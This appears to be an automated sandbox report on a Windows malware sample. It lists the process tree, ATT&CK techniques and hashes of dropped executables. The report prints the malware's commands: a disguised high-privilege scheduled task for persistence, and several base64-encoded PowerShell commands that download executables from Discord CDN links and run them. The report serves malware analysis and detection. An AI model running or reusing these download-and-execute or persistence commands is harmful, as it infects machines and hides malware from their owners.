- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:5084

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:548

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\o91ZrCRLvL.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1880

C:\Users\Admin\AppData\Local\Temp\o91ZrCRLvL.exe
C:\Users\Admin\AppData\Local\Temp\o91ZrCRLvL.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADUANwAzADUAMwAzADMAMwA5ADcANAA4AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAbQBuAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AHoAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAHoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBxAHcAZQBxAHcAZQB3AHEAZQAuAGUAeABlACcAKQApADwAIwBsAHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AGsAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBsAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAdwBxAGUALgBlAHgAZQAnACkAPAAjAG0AYgBmACMAPgA="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Users\Admin\AppData\Roaming\qweqwewqe.exe
"C:\Users\Admin\AppData\Roaming\qweqwewqe.exe"
5⤵
- Executes dropped EXE
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 816
6⤵
- Program crash
PID:3156

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\3GWeRRnymH.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Users\Admin\AppData\Local\Temp\3GWeRRnymH.exe
C:\Users\Admin\AppData\Local\Temp\3GWeRRnymH.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADUAOAA3ADcAOAA1ADUAOQAyADkANgAzAC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAawB1AHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AHcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwByAGUAdABlAHIAdABlAGUALgBlAHgAZQAnACkAKQA8ACMAagByAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBwAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAeABhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAZQB0AGUAcgB0AGUAZQAuAGUAeABlACcAKQA8ACMAZgBzAHMAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ZKzDHWBqis.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Users\Admin\AppData\Local\Temp\ZKzDHWBqis.exe
C:\Users\Admin\AppData\Local\Temp\ZKzDHWBqis.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdABwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMAA4ADgAMAAzADIANAAyADAAMgA0AC8AZABsAHAAYwBkAGkAbABkAG8AbQAuAGUAeABlACcALAAgADwAIwBhAHQAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcgBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAGEAcwBkAHMAYQAuAGUAeABlACcAKQApADwAIwB2AGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBiAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBzAGQAYQBzAGQAcwBhAC4AZQB4AGUAJwApADwAIwB2AHAAeAAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\n5OyRoezGh.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Users\Admin\AppData\Local\Temp\n5OyRoezGh.exe
C:\Users\Admin\AppData\Local\Temp\n5OyRoezGh.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAcwB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADgAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMQA3ADQANwA3ADAANwAwADgANQA4AC8ARABlAGYAZQBuAGQAZQByAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACwAIAA8ACMAdgBrAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBuAHoAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHUAaQB5AGkAeQB1AGkALgBlAHgAZQAnACkAKQA8ACMAZABnAG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBzAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAcABoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdQBpAHkAaQB5AHUAaQAuAGUAeABlACcAKQA8ACMAYgBoAGwAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\3lECubOkLU.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Users\Admin\AppData\Local\Temp\3lECubOkLU.exe
C:\Users\Admin\AppData\Local\Temp\3lECubOkLU.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\IBW3OJPR8Y.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcAB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMgA5ADAAMwAyADMAOAA2ADYANAAwAC8AVwBpAG4AZABvAHcAcwBTAGUAaQBzAHMAbwBuAE0AYQBuAGEAZwBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBjAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBsAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQApADwAIwBwAG4AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGgAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwB4AGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQA8ACMAZQBnAHoAIwA+AA=="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Users\Admin\AppData\Local\Temp\IBW3OJPR8Y.exe
C:\Users\Admin\AppData\Local\Temp\IBW3OJPR8Y.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAdABnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYANQA1ADEAMQAyADUANgAwADcAMQAxAC8AVwBpAG4AZABvAHcAcwBTAGUAaQBzAHMAbwBuAE0AYQBuAGEAZwBlAHIALgBlAHgAZQAnACwAIAA8ACMAagBhAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGgAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGoAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBlAGUAZQBlAGUAZQBlAGUAZQBlAGUAZQBlAC4AZQB4AGUAJwApACkAPAAjAGIAbABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAaQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBlAGUAZQBlAGUAZQBlAGUAZQBlAGUAZQBlAC4AZQB4AGUAJwApADwAIwBjAGEAcgAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
1⤵
- Executes dropped EXE
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3380 -ip 3380
1⤵
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dsffe4vb5.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
daac9c13da6de6812b488fe70af0184c

SHA1
1ec08d3ce601c8912c1bb293d6d5bc750491e186

SHA256
a36e315cb51ad4e3a8fc69ae369b1bdbc092554cef27b44a012c059d0184a8b5

SHA512
5b634a6c7b4f9d55754ca6c49be18ee4757e1aa5665084b2b1f87e4fc91c5e751ec198e636078aaecaafce416349fae990da0c2f12d22aa6d77dfb56032e8d8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
8569e01fe7c6af489570cb056780c693

SHA1
a615fe0d1240af064a77ab95da25bb33be4ea76d

SHA256
9eecdecf1e44588d6667003b0f232500a653639c68cd680b479ed29344641162

SHA512
23b3c1adf072e28fc8cc8e55f24ce8cc24fbe1461676d3ad9339112e0f28c073f22714ac247037d94db3d540c848ff6f4c05b9ceb6aa4eb30a7f7d577f093b61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2hjVtjiBNv.exe
Filesize
5KB

MD5
a587de0abd290c0cca50352cd98c3f2d

SHA1
da49490c288798293b8d3d00ab4f4fb0f070d08a

SHA256
b8d5709cc3041f63acf07c0643fb753e4940857b96b7d558b43fb9871248936c

SHA512
09ab881b40575a3174ca7141a4a82d6d465f6a96ab2c2a9bf169f895ff9b46327accc3245bb9ea27815c8fd4b7b5787841f553445c3ab48a7160d50f7e1eaba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\2hjVtjiBNv.exe
Filesize
5KB

MD5
a587de0abd290c0cca50352cd98c3f2d

SHA1
da49490c288798293b8d3d00ab4f4fb0f070d08a

SHA256
b8d5709cc3041f63acf07c0643fb753e4940857b96b7d558b43fb9871248936c

SHA512
09ab881b40575a3174ca7141a4a82d6d465f6a96ab2c2a9bf169f895ff9b46327accc3245bb9ea27815c8fd4b7b5787841f553445c3ab48a7160d50f7e1eaba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\3GWeRRnymH.exe
Filesize
6KB

MD5
bdf41379303157223ab0d3df362030bb

SHA1
cb47d10e7cdf7a4a9591e2549484db0a52b223fd

SHA256
4f8e21c6106d479d4c880f5e7dcd1298b51aeffc0695030ed856c4ab7081c229

SHA512
d42114314d91d6bd1f5869457b6a8abd325618669884940717630cf91a8deab30f27564cbdb2ceb779223c9719df421a6c70887cde3d9f3d6355eea52e6be300

Download Submit
C:\Users\Admin\AppData\Local\Temp\3GWeRRnymH.exe
Filesize
6KB

MD5
bdf41379303157223ab0d3df362030bb

SHA1
cb47d10e7cdf7a4a9591e2549484db0a52b223fd

SHA256
4f8e21c6106d479d4c880f5e7dcd1298b51aeffc0695030ed856c4ab7081c229

SHA512
d42114314d91d6bd1f5869457b6a8abd325618669884940717630cf91a8deab30f27564cbdb2ceb779223c9719df421a6c70887cde3d9f3d6355eea52e6be300

Download Submit
C:\Users\Admin\AppData\Local\Temp\3lECubOkLU.exe
Filesize
6KB

MD5
9acb87e9bfc6721cadc2b6ddb80be20a

SHA1
c9954ae3e541877fb9ddb1c467d6e20b9eb15db4

SHA256
066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7

SHA512
ffebd124686f09a478a2aeed7dd3ca2c51460ad2f530d157ef377b62dfd5c5a7dd9d4eaf899fb1aa7f6928ad7cc33a5b3d6113e241150ed3752764a4bf18e657

Download Submit
C:\Users\Admin\AppData\Local\Temp\3lECubOkLU.exe
Filesize
6KB

MD5
9acb87e9bfc6721cadc2b6ddb80be20a

SHA1
c9954ae3e541877fb9ddb1c467d6e20b9eb15db4

SHA256
066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7

SHA512
ffebd124686f09a478a2aeed7dd3ca2c51460ad2f530d157ef377b62dfd5c5a7dd9d4eaf899fb1aa7f6928ad7cc33a5b3d6113e241150ed3752764a4bf18e657

Download Submit
C:\Users\Admin\AppData\Local\Temp\H5z75atzCJ.exe
Filesize
6KB

MD5
378deda0d1313deba917adfc74173962

SHA1
cb466cdd64949febdaaae75625d5a3ce0fff6e35

SHA256
d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

SHA512
c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

Download Submit
C:\Users\Admin\AppData\Local\Temp\H5z75atzCJ.exe
Filesize
6KB

MD5
378deda0d1313deba917adfc74173962

SHA1
cb466cdd64949febdaaae75625d5a3ce0fff6e35

SHA256
d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

SHA512
c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBW3OJPR8Y.exe
Filesize
6KB

MD5
218f6e6ed0717dffd142211567a699a9

SHA1
0fa9e2c28c09c3876559c4667765fbbf338c4920

SHA256
5270d023aefd2d8380cc94af4ff2d6600e06532645d440fe4804ac4e3bc1d36f

SHA512
c44665670f3f773bec2bbfd41303430003b70100da2af30826309c2765e7c248a3fcc90015f75d9ffc325d0c033e1f12956ff5719cc5c5c03a358b5a3cf5ca9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBW3OJPR8Y.exe
Filesize
6KB

MD5
218f6e6ed0717dffd142211567a699a9

SHA1
0fa9e2c28c09c3876559c4667765fbbf338c4920

SHA256
5270d023aefd2d8380cc94af4ff2d6600e06532645d440fe4804ac4e3bc1d36f

SHA512
c44665670f3f773bec2bbfd41303430003b70100da2af30826309c2765e7c248a3fcc90015f75d9ffc325d0c033e1f12956ff5719cc5c5c03a358b5a3cf5ca9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZKzDHWBqis.exe
Filesize
5KB

MD5
066725f0d958d14460e6c658abd81666

SHA1
f99bbe5c7fe5f836c56ae03690eb6709d903b1ae

SHA256
24438175b4dc760a6985c738d14ed1639f7fe38d6134dc97160e882d145d14fa

SHA512
bfdf6bc3542e6d2048619f06a78baf4517ed50d2c318f15d090f7c613c514f164feb98bce22d3758095ca27b2f1cbe77e5630970e97684535a36db48d4cf0f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZKzDHWBqis.exe
Filesize
5KB

MD5
066725f0d958d14460e6c658abd81666

SHA1
f99bbe5c7fe5f836c56ae03690eb6709d903b1ae

SHA256
24438175b4dc760a6985c738d14ed1639f7fe38d6134dc97160e882d145d14fa

SHA512
bfdf6bc3542e6d2048619f06a78baf4517ed50d2c318f15d090f7c613c514f164feb98bce22d3758095ca27b2f1cbe77e5630970e97684535a36db48d4cf0f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\n5OyRoezGh.exe
Filesize
6KB

MD5
927455ddb1b992aeccb124f44d2a6662

SHA1
42a3d55b04d0ebe9b55b5e343e97c7eb8513c1a4

SHA256
7c1f6f038401e0a3675b3bda5cbd8828f5b2d1b7663eacd4b8e8c741897d686b

SHA512
9f4679e9cb10fd89840b3ccfb74f0f1d3f176c96b6d3980cf9d39d07494e587227a7161dabda438081d3adc5e9ecd859215155b5e2abb8caa694a68276eeb4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\n5OyRoezGh.exe
Filesize
6KB

MD5
927455ddb1b992aeccb124f44d2a6662

SHA1
42a3d55b04d0ebe9b55b5e343e97c7eb8513c1a4

SHA256
7c1f6f038401e0a3675b3bda5cbd8828f5b2d1b7663eacd4b8e8c741897d686b

SHA512
9f4679e9cb10fd89840b3ccfb74f0f1d3f176c96b6d3980cf9d39d07494e587227a7161dabda438081d3adc5e9ecd859215155b5e2abb8caa694a68276eeb4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\o91ZrCRLvL.exe
Filesize
6KB

MD5
69fd2890a9b6e2652979cf6fbadb876f

SHA1
7a4827b419c31b560b1a96cc15ad05ef9996e771

SHA256
adee26dc4aef422bfb93a4e6de9d9e359e51639775aabd146fc4226efe5f05ea

SHA512
503b1041cf343f3d08963e19bbc09435fdf1826ae157231aba41c72ce820870734fa070b20137bca4c308cb2abfdec5888abba46a6ea28c5e5e5692a1ac1911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\o91ZrCRLvL.exe
Filesize
6KB

MD5
69fd2890a9b6e2652979cf6fbadb876f

